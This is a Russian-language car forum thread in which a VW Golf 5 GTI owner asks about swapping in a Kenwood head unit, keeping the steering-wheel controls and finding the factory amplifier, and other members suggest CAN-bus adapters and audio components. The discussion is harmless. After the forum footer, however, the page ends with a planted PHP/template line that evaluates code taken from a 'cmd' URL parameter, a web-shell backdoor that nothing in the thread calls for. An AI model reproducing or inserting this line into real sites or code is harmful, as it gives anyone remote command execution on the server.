+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 16

Тема: Давай те разберемся вместе!


  1. #1
    GTI-Racing Magestic is on a distinguished road Аватар для Magestic
    Регистрация
    19.02.2008
    Сообщений
    25
    Здравствуйте уважаемые форумчане и обладатели автомобилей VW Golf 5. Встал передо мной вопрос озвучить автомобильчик VW Golf 5 GTI 3 door. Значит, я начал над этим делом кумекать. Изначально стоит магнитола RCD-300 и 2-х компонентный фронт (свистки + миды, серединки нету ). Еще имеется на этом автомобильчике кнопки для управления магнитолой (переключение трэков, управление громкостью, приглушение звука (аттенюатор)). Вот к чему я пришел. Имея в нычке магнитолу Kenwood 627-й я решил все таки туда её замостырить. Рамка переходная есть. В принципе описал вроде все теперь вопросы.

    1. на ГУ (головное устройства, магнитола) Kenwood есть разъем ISO. В мануале сказано что этот разъем можно использовать для сопряжения с мульти-рулем в автомобилях (ну мол можно было управлять магнитолой с руля).
    Питание магнитолы планируется вывести автономное, так же как и «землю». Как можно и можно ли вообще соединить по шине ISO руль с магнитолой? Если нет тогда предложите другие альтернативные варианты. Если у кого то имеется опыт поделитесь пожалуйста. Соответственно я буду описывать весь инсталляционный процесс в машине и подкреплять все фотографиями.

    Планы на озвучивание:
    1. Замена ГУ
    2. Замена фронтальной акустики на более громкую и музыкальную
    3. Установка саббубена
    4. Фронт и саб снабдить усилителями
    5. Без шумки никуда канешно дальше не пойдем.

    У меня многа знаний в плане автозвука и многа идей и имеется опыт. Но эти шины и эти сопряжения мне непонятны. Жду Ответов.

    С уважением Димка!:)

  2. #2
    GTI-Racing Magestic is on a distinguished road Аватар для Magestic
    Регистрация
    19.02.2008
    Сообщений
    25
    Продолжу.

    Еще в программе "элса" было выкапано что там, в гольфе есть уже какойто усилитель рядом в водительским сиденьем. соответственно вопрос реально ли он там существует? Кто нибуть добирался до него? если кто добирался раскажите как он соединен с ГУ?

  3. #3
    кто нибуть на какой нибуть магнитоле сопрягал кнопки на руле с магнитолой ?

  4. #4
    GTI-Racing Magestic is on a distinguished road Аватар для Magestic
    Регистрация
    19.02.2008
    Сообщений
    25
    ну лан брат почитав форум понял...тут в основном одни флудеры :rolleyes:
    буд искать сами
    и результаты уже есть дело только за временем

  5. #5
    <div class='quotetop'>Цитата(Magestic &#064; Feb 20 2008, 10&#58;06) <{POST_SNAPBACK}></div><div class='quotemain'>ну лан брат почитав форум понял...тут в основном одни флудеры :rolleyes:
    буд искать сами
    и результаты уже есть дело только за временем[/b][/quote]

    для полноценной работы нужен адаптер CAN-bus для подключения другой магнитолы, цена 7000р
    p.s. если будете свою RCD300 продавать - напишите в личку минимум за сколько

  6. #6
    мы находимся в ХМАО....4500 км от Москвы

  7. #7
    на выходных купили Helix DarkBlue 4, Hertz 165 и пищалки Hertz HT 25. Осталось купить только усилитель к Alpine SWR 1222

  8. #8
    в таком бюджете лучше взял бы пищи мт-23.... голову возьми альпайн... только уточни... просто у них есть функция такая на нескольких магнитолах, что штатные кпопки будут работать с башкой...

    мидбасы взял лучший в своей ценовой категории...
    ну про усь хз .... весьма часто используют его
    саб... ну достаточно неплохой

  9. #9
    Мне ставили can модуль. http://www.tec-electronics.ru/page.html?p=3&id=344 вот этот. от него нужна была только одна функция ACC ( тоесть нахождение ключа в замке зажигания) для того чтобы на усилитель питание шло. там по сслылке инструкцию можно посмотреть. по поводу кнопок на руль незнаю , но думаю тоже дожны быть модули такие, продают в SV ART.

  10. #10
    GTI-Racing crawl is on a distinguished road Аватар для crawl
    Регистрация
    13.09.2007
    Откуда
    MV, CA USA
    Машина
    Jetta 2.0T
    Сообщений
    141
    <div class='quotetop'>Цитата(Magestic &#064; Feb 19 2008, 01&#58;50) <{POST_SNAPBACK}></div><div class='quotemain'>Здравствуйте уважаемые форумчане и обладатели автомобилей VW Golf 5. Встал передо мной вопрос озвучить автомобильчик VW Golf 5 GTI 3 door. Значит, я начал над этим делом кумекать. Изначально стоит магнитола RCD-300 и 2-х компонентный фронт (свистки + миды, серединки нету ). Еще имеется на этом автомобильчике кнопки для управления магнитолой (переключение трэков, управление громкостью, приглушение звука (аттенюатор)). Вот к чему я пришел. Имея в нычке магнитолу Kenwood 627-й я решил все таки туда её замостырить. Рамка переходная есть. В принципе описал вроде все теперь вопросы.

    1. на ГУ (головное устройства, магнитола) Kenwood есть разъем ISO. В мануале сказано что этот разъем можно использовать для сопряжения с мульти-рулем в автомобилях (ну мол можно было управлять магнитолой с руля).
    Питание магнитолы планируется вывести автономное, так же как и «землю». Как можно и можно ли вообще соединить по шине ISO руль с магнитолой? Если нет тогда предложите другие альтернативные варианты. Если у кого то имеется опыт поделитесь пожалуйста. Соответственно я буду описывать весь инсталляционный процесс в машине и подкреплять все фотографиями.

    Планы на озвучивание:
    1. Замена ГУ
    2. Замена фронтальной акустики на более громкую и музыкальную
    3. Установка саббубена
    4. Фронт и саб снабдить усилителями
    5. Без шумки никуда канешно дальше не пойдем.

    У меня многа знаний в плане автозвука и многа идей и имеется опыт. Но эти шины и эти сопряжения мне непонятны. Жду Ответов.

    С уважением Димка&#33;:)[/b][/quote]


    Все сделать можно, для это есть специальные модули, но более подробное описалово того как все это сделать надо искать на иноязычных форумах. Что касается усилителя, то он идет только с пакетом премиум саунд и его легко найти, он реально под седлом стоит.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Меняем радиатор печки вместе
    от Boost-up-girl в разделе Кузов
    Ответов: 5
    Последнее сообщение: 12.02.2018, 14:04
  2. Давайте разберемся
    от Босх в разделе Отзывы / Выбор
    Ответов: 175
    Последнее сообщение: 22.08.2013, 16:28
  3. Ответов: 20
    Последнее сообщение: 02.07.2010, 12:21
  4. Мы такие разные и всё-таки мы вместе)
    от Lina в разделе Клубные фотки и видео
    Ответов: 6
    Последнее сообщение: 30.04.2010, 15:06
  5. подёргаем вместе??
    от BMXer в разделе Курилка
    Ответов: 13
    Последнее сообщение: 19.06.2007, 15:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}